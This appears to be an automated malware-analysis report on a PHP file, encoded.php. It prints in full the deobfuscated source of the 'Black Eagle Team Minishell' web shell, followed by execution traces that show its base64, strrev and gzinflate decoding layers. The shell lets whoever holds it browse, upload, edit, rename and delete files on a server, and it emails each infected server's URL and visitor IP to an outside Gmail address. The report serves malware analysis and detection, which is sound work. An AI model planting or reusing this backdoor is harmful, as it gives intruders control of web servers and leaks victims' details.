PHP Malware Analysis
encoded.php
md5: 95a5adb133d5017a5c905c78afa2a517
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- alfredofernandezbutar@gmail.com (Deobfuscated, Traces)
Encoding
- base64_decode (Deobfuscated, Traces)
Environment
- error_reporting (Deobfuscated, Traces)
- getcwd (Deobfuscated, Traces)
- set_time_limit (Deobfuscated, Traces)
Execution
Files
- copy (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
- _GET (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
Title
- ' . $sname . ' (Deobfuscated)
- \'.$sname.\' (Traces)
- Black Eagle Team Minishell (HTML)
URLs
- http://localhost/uploads/encoded.php (Traces)
- https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js (Deobfuscated, HTML, Traces)
- https://colorlib.com/preview/theme/satner/img/banner/home-right.png (Deobfuscated, HTML, Traces)
- https://fonts.googleapis.com/css?family=VT323 (Deobfuscated, HTML, Traces)
- https://i.postimg.cc/PJYNcNJ4/BET.jpg (Deobfuscated, HTML, Traces)
- https://shell.prinsh.com (Deobfuscated, Traces)
Deobfuscated PHP code
<?php
$qRng = 'g';
$b = '6';
$mqH = 'r';
$TXxS = 'v';
$AbQK = 'f';
$QZ = 'd';
$eaFTE = 'l';
$EqMnw = '_';
$jxI = 'a';
$l = 'z';
$QwI = 't';
$ig = 'c';
$Wcy = 'b';
$h = '4';
$wRH = 's';
$VYyIr = 'o';
$cUj = 'n';
$mtVpo = 'i';
$iG = 'e';
$Y = "base64_decode";
$cVPt = "gzinflate";
$c = "strrev";
eval /* PHPDeobfuscator eval output */ {
?><!-- Downloaded From: https://shell.prinsh.com -->
<?php
$p3mu14 = "ZXZhbCgiPz4iLmd6dW5jb21wcmVzcyhnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGd6aW5mbGF0ZShnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJGFyaWYpKSkpKSkpKTs";
$arif = "=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";
eval /* PHPDeobfuscator eval output */ {
/*
Black Eagle Team Shell v2
By : Bo0G3yM4n
Thanks To : Black Eagle Team, Dark Clown Security
Jangan Suka NgeRecode Klo Recode Kalian Ampas ;v
Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell
*/
set_time_limit(0);
error_reporting(0);
error_log(0);
$sname = "Black Eagle Team Minishell";
$__gcdir = "getcwd";
$__fgetcon7s = "file_get_contents";
$__scdir = "scandir";
$rm__dir = "rmdir";
$un__link = "unlink";
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
echo '<!DOCTYPE html>
<html>
<head>
<meta name="robots" content"noindex. nofollow">
<link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">
<link rel="icon" href="https://colorlib.com/preview/theme/satner/img/banner/home-right.png">
<title>' . $sname . '</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<link href="//zerobyte-id.github.io/PHP-Backdoor/inc/m1n1.css" rel="stylesheet" type="text/css">
</head>
<body>';
echo '<div style="color:#ef6c00;margin-top:0;"><h1><center><img src="https://i.postimg.cc/PJYNcNJ4/BET.jpg" width="350px" height="300" style="border-radius: 100px; -moz-border-radius: 100px;"><br>' . $sname . '</center></h1></div>';
if (isset($_GET['path'])) {
$path = $_GET['path'];
chdir($_GET['path']);
} else {
$path = $__gcdir();
}
$path = str_replace("\\", "/", $path);
$paths = explode("/", $path);
echo "<table width=\"100%\" border=\"0\" align=\"center\" style=\"margin-top:-10px;\"><tr><td>";
echo "<font style='font-size:13px;'>Path: ";
foreach ($paths as $id => $pat) {
echo "<a style='font-size:13px;' href='?path=";
for ($i = 0; $i <= $id; $i++) {
echo $paths[$i];
if ($i != $id) {
echo "/";
}
}
echo "'>{$pat}</a>/";
}
echo "<br>[ <a href=\"?\">Home</a> ]</font></td><td align=\"center\" width=\"27%\"><form enctype=\"multipart/form-data\" method=\"POST\"><input type=\"file\" name=\"file\" style=\"color:#ef6c00;margin-bottom:4px;\"/><input type=\"submit\" value=\"Upload\" /></form></td></tr><tr><td colspan=\"2\">";
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo "<center><font color=\"#00ff00\">Upload Berhasil!!</font></center><br/>";
} else {
echo "<center><font color=\"red\">Upload Gagal!!</font></center><br/>";
}
}
echo "</td></tr><tr><td></table><div class=\"table-div\"></div><input id=\"image\" type=\"hidden\">";
echo "";
if (isset($_GET['filesrc'])) {
echo "<table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr><td>File: ";
echo "" . basename($_GET['filesrc']);
"";
echo "</tr></td></table><br />";
echo "<center><textarea readonly=''>" . htmlspecialchars($__fgetcon7s($_GET['filesrc'])) . "</textarea></center>";
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
if ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo "<center><font color=\"#00ff00\">Rename OK!</font></center><br />";
} else {
echo "<center><font color=\"red\">Rename Failed!</font></center><br />";
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" /> <input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="rename"><input type="submit" value="Save" /></form>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo "<center><font color=\"#00ff00\">Edit File OK!.</font></center><br />";
} else {
echo "<center><font color=\"red\">Edit File Failed!.</font></center><br />";
}
fclose($fp);
}
echo '<form method="POST"><textarea cols=80 rows=20 name="src">' . htmlspecialchars($__fgetcon7s($_POST['path'])) . '</textarea><br /><input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="edit"><input type="submit" value="Save" /></form>';
}
echo "</center>";
} else {
echo "</table><br /><center>";
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if ($rm__dir($_POST['path'])) {
echo "<center><font color=\"#00ff00\">Dir Deleted!</font></center><br />";
} else {
echo "<center><font color=\"red\">Delete Dir Failed!</font></center><br />";
}
} elseif ($_POST['type'] == 'file') {
if ($un__link($_POST['path'])) {
echo "<font color=\"#00ff00\">Delete File Done.</font><br />";
} else {
echo "<font color=\"red\">Delete File Error.</font><br />";
}
}
}
echo "</center>";
$_scdir = $__scdir($path);
echo "<div id=\"content\"><table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr class=\"first\"> <th><center>Name</center></th><th width=\"12%\"><center>Size</center></th><th width=\"10%\"><center>Permissions</center></th> <th width=\"15%\"><center>Last Update</center></th><th width=\"11%\"><center>Options</center></th></tr>";
foreach ($_scdir as $dir) {
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "<tr><td>[D] <a href=\"?path={$path}/{$dir}\">{$dir}</a></td><td><center>--</center></td><td><center>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"#00ff00\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</font>";
}
echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$dir}")) . "";
echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path={$path}\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option></select><input type=\"hidden\" name=\"type\" value=\"dir\"><input type=\"hidden\" name=\"name\" value=\"{$dir}\"><input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\"> <input type=\"submit\" value=\">>\" /></form></center></td></tr>";
}
foreach ($_scdir as $file) {
if (!is_file("{$path}/{$file}")) {
continue;
}
$size = filesize("{$path}/{$file}") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size .= ' KB';
}
echo "<tr><td>[F] <a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td><td><center>" . $size . "</center></td><td><center>";
if (is_writable("{$path}/{$file}")) {
echo "<font color=\"#00ff00\">";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</font>";
}
echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$file}")) . "";
echo "</center></td><td><center><form method=\"POST\" action=\"?option&path={$path}\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option><option value=\"edit\">Edit</option></select><input type=\"hidden\" name=\"type\" value=\"file\"><input type=\"hidden\" name=\"name\" value=\"{$file}\"><input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\"> <input type=\"submit\" value=\">>\" /></form></center></td></tr>";
}
echo "</table></div>";
}
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xc000) == 0xc000) {
$info = 's';
} elseif (($perms & 0xa000) == 0xa000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= $perms & 0x100 ? 'r' : '-';
$info .= $perms & 0x80 ? 'w' : '-';
$info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
$info .= $perms & 0x20 ? 'r' : '-';
$info .= $perms & 0x10 ? 'w' : '-';
$info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
$info .= $perms & 0x4 ? 'r' : '-';
$info .= $perms & 0x2 ? 'w' : '-';
$info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
return $info;
}
echo "<br><center>© <span id=\"footer\"></span> 2020 Black Eagle Team</center><br>";
echo "</body></html><!-- EOF -->";
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$to = 'alfredofernandezbutar@gmail.com';
$f31337 = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$fie = "Akses {$f31337} :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($to, "Papa Yui Chan Dapet Shell Nih : )", $fie, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
};
exit;
};Execution traces
data/traces/95a5adb133d5017a5c905c78afa2a517_trace-1676238790.3681.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:53:36.265949]
1 0 1 0.000151 393528
1 3 0 0.000237 406080 {main} 1 /var/www/html/uploads/encoded.php 0 0
1 A /var/www/html/uploads/encoded.php 1 $qRng = 'g'
1 A /var/www/html/uploads/encoded.php 1 $b = '6'
1 A /var/www/html/uploads/encoded.php 1 $mqH = 'r'
1 A /var/www/html/uploads/encoded.php 1 $TXxS = 'v'
1 A /var/www/html/uploads/encoded.php 1 $AbQK = 'f'
1 A /var/www/html/uploads/encoded.php 1 $QZ = 'd'
1 A /var/www/html/uploads/encoded.php 1 $eaFTE = 'l'
1 A /var/www/html/uploads/encoded.php 1 $EqMnw = '_'
1 A /var/www/html/uploads/encoded.php 1 $jxI = 'a'
1 A /var/www/html/uploads/encoded.php 1 $l = 'z'
1 A /var/www/html/uploads/encoded.php 1 $QwI = 't'
1 A /var/www/html/uploads/encoded.php 1 $ig = 'c'
1 A /var/www/html/uploads/encoded.php 1 $Wcy = 'b'
1 A /var/www/html/uploads/encoded.php 1 $h = '4'
1 A /var/www/html/uploads/encoded.php 1 $wRH = 's'
1 A /var/www/html/uploads/encoded.php 1 $VYyIr = 'o'
1 A /var/www/html/uploads/encoded.php 1 $cUj = 'n'
1 A /var/www/html/uploads/encoded.php 1 $mtVpo = 'i'
1 A /var/www/html/uploads/encoded.php 1 $iG = 'e'
1 A /var/www/html/uploads/encoded.php 1 $Y = 'base64_decode'
1 A /var/www/html/uploads/encoded.php 1 $cVPt = 'gzinflate'
1 A /var/www/html/uploads/encoded.php 1 $c = 'strrev'
2 4 0 0.000470 406192 base64_decode 0 /var/www/html/uploads/encoded.php 1 1 'F/x7z//xhzv+38/1/37dw9fnv0/xSzf/6v/sCS90st9/4bY8f8oufMos//bdJvIdNvMpfYcd82P8OmeX2xf6C4tVK7GIbdjn9EurL1kJSlzF9uwD6VvOAJcnJ/sjyeBXqBiayauLmMcqXsEg/9WLD5wqKmeQgXH1wKFoVZsaX7bCbFlJhRJQQuixh2Me22QSgpsbZKuP3UoqFbpI3AQTPJfdVblk2Aco3jShSljvr5WK1a64HJ433PiVEwSoyIjOGwkwRlW3nmTrv84fjo8mxIu4gw6QZVc9j2DTpSwSlCqpqL86xaOshHjWQkWxgeJb3HuuceZElNa+uWy4AnFjTUubi9Bq6A3dbQrixCtcg8r1F3IG/zxLjxFsasi1UldxwNFM8itwhdyITyopY4GRdCfyazWD5HsK89vkCyKXipkuNenHXrJteI9G3CsgHx1JnF9L8Wisp/bQuiIc/QnmN3aoeJTMWPiblU4FMOL+tIvEw4k6uYsnHvUk30BIxgvp'
2 4 1 0.000510 414416
2 4 R '\027�{��;����~����O�K7���\t/t���<�.|�,���&�\0356�)}�\035�c�:g��\027�\v�U+��m���K�/Y\tJ\\��\003�[�\000�\'\'�#��W�\030�ɫ���*^� �Ջ\017�**g��q���hU�\032_��lYI�\022PB豇c\036�d\022��\033d���J*\025�H�\004\023<��U�d�\a(�4�JXﯕ�ծ�\034�7��\023\004�Ȉ�\033\t0FU��d��\037��&ċ��\016�eW=�`ӥ,\022�*���:ţ��x�BE���[�{�q�D�־�l�\002qcMK���j�\r�m\n��+\\��\027r\006�<K�\021ljȵRWq��L�+p�܈O*)c��t\'�k5��{\n���\v"���.5��^�mx�F�+ \037\035I�_K�h���к"\034�\t�7v�x��X���N\0050���É:��\'\036�$�@H�\v�x\031\025ا���'
2 5 0 0.000616 414384 strrev 0 /var/www/html/uploads/encoded.php 1 1 '\027�{��;����~����O�K7���\t/t���<�.|�,���&�\0356�)}�\035�c�:g��\027�\v�U+��m���K�/Y\tJ\\��\003�[�\000�\'\'�#��W�\030�ɫ���*^� �Ջ\017�**g��q���hU�\032_��lYI�\022PB豇c\036�d\022��\033d���J*\025�H�\004\023<��U�d�\a(�4�JXﯕ�ծ�\034�7��\023\004�Ȉ�\033\t0FU��d��\037��&ċ��\016�eW=�`ӥ,\022�*���:ţ��x�BE���[�{�q�D�־�l�\002qcMK���j�\r�m\n��+\\��\027r\006�<K�\021ljȵRWq��L�+p�܈O*)c��t\'�k5��{\n���\v"���.5��^�mx�F�+ \037\035I�_K�h���к"\034�\t�7v�x��X���N\0050���É:��\'\036�$�@H�\v�x\031\025ا���'
2 5 1 0.000717 418512
2 5 R '��W\016�R���*\016�\a�uq\016C�r�9�\0059�<��g\020�\000,�du뫿�o��o����k\032�(�?�6���~��_@po�a��ek����|\036�������ߖf�˟X��?����(i2�n�\027k�� �\020�2\004��1x��)8b���%e�Q}N�e��d�#gPłHC|�D\001J�߷�p$��\024�?ǣ�&^\fE�3����o!)O\022ų"\nO\032Ƌ�S����?�[[������\000�\n=qtЯ��F�Q�\v���4\025��5\033\004�㚞ϭq_�䱱\022߈%hAZ�\\7s<�\024��T���\001r%HŪ\f��u4�\\��\034t�C}\022\r?�3v\016���5Ԯ����\r���\022� \002���kq�z����\035�bF�\005�\r\001a�9�qTR\002�X�\001ece�x��h;X�y\023\tY��\v:��G\030B:٘�H'
2 6 0 0.000821 410288 gzinflate 0 /var/www/html/uploads/encoded.php 1 1 '��W\016�R���*\016�\a�uq\016C�r�9�\0059�<��g\020�\000,�du뫿�o��o����k\032�(�?�6���~��_@po�a��ek����|\036�������ߖf�˟X��?����(i2�n�\027k�� �\020�2\004��1x��)8b���%e�Q}N�e��d�#gPłHC|�D\001J�߷�p$��\024�?ǣ�&^\fE�3����o!)O\022ų"\nO\032Ƌ�S����?�[[������\000�\n=qtЯ��F�Q�\v���4\025��5\033\004�㚞ϭq_�䱱\022߈%hAZ�\\7s<�\024��T���\001r%HŪ\f��u4�\\��\034t�C}\022\r?�3v\016���5Ԯ����\r���\022� \002���kq�z����\035�bF�\005�\r\001a�9�qTR\002�X�\001ece�x��h;X�y\023\tY��\v:��G\030B:٘�H'
2 6 1 0.000949 418512
2 6 R '?><!-- Downloaded From: https://shell.prinsh.com -->\n\n<?php\n $p3mu14 = "ZXZhbCgiPz4iLmd6dW5jb21wcmVzcyhnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGd6aW5mbGF0ZShnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJGFyaWYpKSkpKSkpKTs"; $arif = "=wb+JvwdMZRM/UfOfx3IuBJOw0wJj7OJMQsLQ/+ouwny9xLDtTOE4mfGzXC6AFHqScMOc5aLJDUDKRP9kju/De/8YKI0GqPuhcIgtHbOlM/989ZL5uWvYRuLkTPqWLwiBciezWPc6Dje/P06/reutPDbqvvzO5ij+a4NXt/3r2/1GRvqmmJa6+DCSy/INqB1pdztqmQR4jDTn70PFI5FM+bzuWW0M7hOUmAnKnJVeucFPWJnY4H75mjDi2mxwBzzouoQrAQeGFS9vlBK8YxJjv9KeyGOBD4uoC'
2 7 0 0.001022 420496 eval 1 '?><!-- Downloaded From: https://shell.prinsh.com -->\n\n<?php\n $p3mu14 = "ZXZhbCgiPz4iLmd6dW5jb21wcmVzcyhnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGd6aW5mbGF0ZShnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJGFyaWYpKSkpKSkpKTs"; $arif = "=wb+JvwdMZRM/UfOfx3IuBJOw0wJj7OJMQsLQ/+ouwny9xLDtTOE4mfGzXC6AFHqScMOc5aLJDUDKRP9kju/De/8YKI0GqPuhcIgtHbOlM/989ZL5uWvYRuLkTPqWLwiBciezWPc6Dje/P06/reutPDbqvvzO5ij+a4NXt/3r2/1GRvqmmJa6+DCSy/INqB1pdztqmQR4jDTn70PFI5FM+bzuWW0M7hOUmAnKnJVeucFPWJnY4H75mjDi2mxwBzzouoQrAQeGFS9vlBK8YxJjv9KeyGOBD4uoCvXn7cZEi6gq/L3h10lU7YPH2HC2SRpu8RUBY8pwFY4yIW8j2MgQerhkdOhihbU6P+vg2tf1YuiLTJj+/PpLTpX0R6HUdsQxXPTV8W2zcssm+Qp8PYqeYKxc7I9zTs/NoKHfdQS16/3SUvOxX6FFjW9wJS5ATEqgWcMS0qcKiW9SIr2J+0PtGVKn1sqlwV+iS1n0o0yHraJ8YvoT9s6hla5eoj4GWrueAMPkhKZ0E348JvKvRytvnMr6xrhyG/xDJk0MgAxXzIcWv6hmneUdjwQFaBaId7vXDvyWTdZLFlltFWlviqyeOKLeP8KcFdlzYUW8O2KchjyYGnlvhiyX7oMnyRZbiTZrdSGS5kMyi2TXigyggXnCf8VZfbxMj1+raVr86TqlgOil+otkJFzkPyWKIh8O5+7DAkMO6RVCns7CWMvYeSYsB0j6TMbjYFmtitBPrY0fJx/WvB11MFcobhd/8/5AuNqR35h/MtmuRXLnZltySN4bk3Ku52C/Nm0zClF2X+NhveidQVlJqlaBe+z0YG6HqTMwWun20yaeuW9I/6oWYThq7s5J/LnTq8qpGA00YUWhZk83XRdqbqkmji0Dcaquc9C4BRwc5dtaJpYAI42HeButbVDdOM2Qrg5GrSr6kIRRiNKJiFiBDkSMX38ChEghKHfOb+GXPqhLVz1n35vD5Y66xW28Q6qoB/27xSJjHtZvxXVRNNS5BLxxTKMlHlhFsKknlanpowdMuTL0l+a7xYYEf9pUbb3MtJFHmoWyoZjNKh4eADqs6aAJIdICEnpe1tXIaQNGYRuQaYHqG6hKdexk1ZI+kohiPoCL8ijvFEBHAqlnS+jlf+y1KhxMiklWg5NBZ2lrqjQ3xzVBVXboyrwCFS8Gq4MEtKBrJunhvwR0PO62wV53Qnwb61TGhzKEKXAvujdfx3xWJX5imY0364n4+yDp1wwnyv3p+gPZbD9mDunxDaihZH8dJcdQLjP+Z8KfQuY9KWrF90857D6pNBHlPllVhQhhDylctTDA7G1vkznt6IYqGfB+X5eDzQtQMMcWMM45XyCbE/wqE/ykww8MwfhkdIM59CKmx6puqOsX3ZR1yddYHPOU8AYewRzRDXwkMbkSzngQQ0TYxVal1e/qfkP2IdxyDL2mVd2p0W1N2eT8hevmfMC5/0NbAAx3rLe7LvU2U3qn9VzSm3cUrvEgu+SbbV3OmH/+0ymXBlqaGLlAvM9L+FkhXYnQka17jr1VnR0EQV4Tuy47xidfAhElPmAqw0RoSJxllYvitrp1vtfQSmF4i9g06L6HTNPsvwrBzYbJ8L+YZNRZthIUMMrkLsngrApmPQMG96WwuPvJoy4dzglwIInxl7/hlNU8KHxjzPx25N6iG900qzfVmNGIiIIU8RdGud6JQ+B4/JmHuDs3fi55snfGf/GUIl7n/8ExEc80w3SoVAyV4jQbn5Qr67jmUVmm3nmmXnxozlOsXCxDNvyFEWXGEJFuelRJHBgHBPHTKaIXIwcQ77cBTQ1FDwps4DwdU3sCckz1sNKRq20BK3ew/F08EolmaKZQzbsMcB+1mmSen4jyH927BH4jpjRNy922J3l+SQ5GNVZX91+IHfqeZcb1S5nflzYOrsvEzBTXV2Vvvcv1wH7auUkzKTgYJs6GXO6UUAnammw12xVgapgnRkVrMNkdQhbpVF